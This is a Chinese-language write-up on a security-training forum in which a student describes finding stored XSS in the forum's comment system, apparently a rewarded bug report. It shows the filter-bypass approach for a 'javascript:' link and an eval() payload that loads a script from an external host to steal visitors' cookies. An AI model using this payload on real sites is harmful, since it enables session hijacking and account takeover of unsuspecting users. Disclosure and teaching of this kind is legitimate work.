【14期-1班-小酒】论坛反射，dom，存储XSS。成功打到cookie- Track 知识社区 - 掌控安全在线教育

演示下效果

方便演示，我新发了一个帖子
https://bbs.zkaq.cn/t/5798.html

点击就会出弹出。

这是打到的cookie

使用cookie 登录时没有问题的。

发现的过程

1，过程起源于聂风老师的一句话。
聂风：找漏洞，不是知道后端如何写的，再使用漏都代码。
而是，你认为他有漏洞，就去测试。结果并不重要
（原话忘记了，反正时这个意思）
2，分析：
xss漏洞，是用户输入的语句，当成前端代码执行了。所以我第一个想到的就是论坛的发帖，以及评论。当然这快肯定被学长搞了N遍了。以前我一直认为论坛怎么可能会有漏洞。现在我换个思路，论坛一定有漏洞。

3，没说的，开始抓包。
为了，不占用资源，我测试的是评论
通过抓包发现：content_html，就是渲染再页面上面的。很明显是url编码。这个老师都讲过

4，通过抓包，改包，发现过滤很多东西。创建新的标签，都会被过滤掉。我测试好久都不行。只能留下原有的标签。于是我想到了，超链接标签。

<p><a href="javascript:alert(1)" title="test">test</a></p>
同样的也是会把 JavaScript 过滤掉

但是，他保留了，alert（1）看到这个我觉得有点希望，只要我把JavaScript留下来就行了。通过尝试，我发现在前面加上单引号，会留下来
<p><a href="'javascript:alert(1)" title="test">test</a></p>

当然了，这个时候虽然把javascript:alert(1) 语句留下来了，但是是不起作用的。我充实了很多办法。大小写，或者拼接等等。都不行。
忽然我想到了，可以试试不用ascii码（我对这个也不熟悉）

然后我就试着这些ascii码。一个个是过去

发现了，这个。加载JavaScript里面没有问题可以允许JavaScript。这个时候我本地测试了。

。然后就跟最上面的演示效果一样了。

5.这个时候虽然可以执行alert 弹出。但是达不到cookie。
我又想，既然alert可以执行，是不是可以执行其他函数，什么函数可以打到cookie呢？document.cookie? 好像不行。只能把cookie显示出来。

于是找了好多资料。我发现又一个语句eval()函数，eval函数可以把字符串当成js语句执行。这个时候就好像发现了新大陆。后面的大家都知道了。

eval('alert(\"金币+1\");var xj=document.createElement(\"script\");console.log(xj);xj.src=\'https:\/\/hk.sb/m6ss\';document.body.appendChild(xj);')
eval执行这个字符串就能够执行创建script标签，并且打到cookie
因为eval是把字符串当成字符串执行的。可以做很多操作。

用户名	金币	时间	理由
奖励系统	100.00	2021-09-11 22:10:11	投稿满 10 赞奖励
奖励系统	50.00	2021-09-10 09:09:24	投稿满 5 赞奖励
Track-手电筒	400.00	2021-09-09 19:07:37	发现漏洞奖励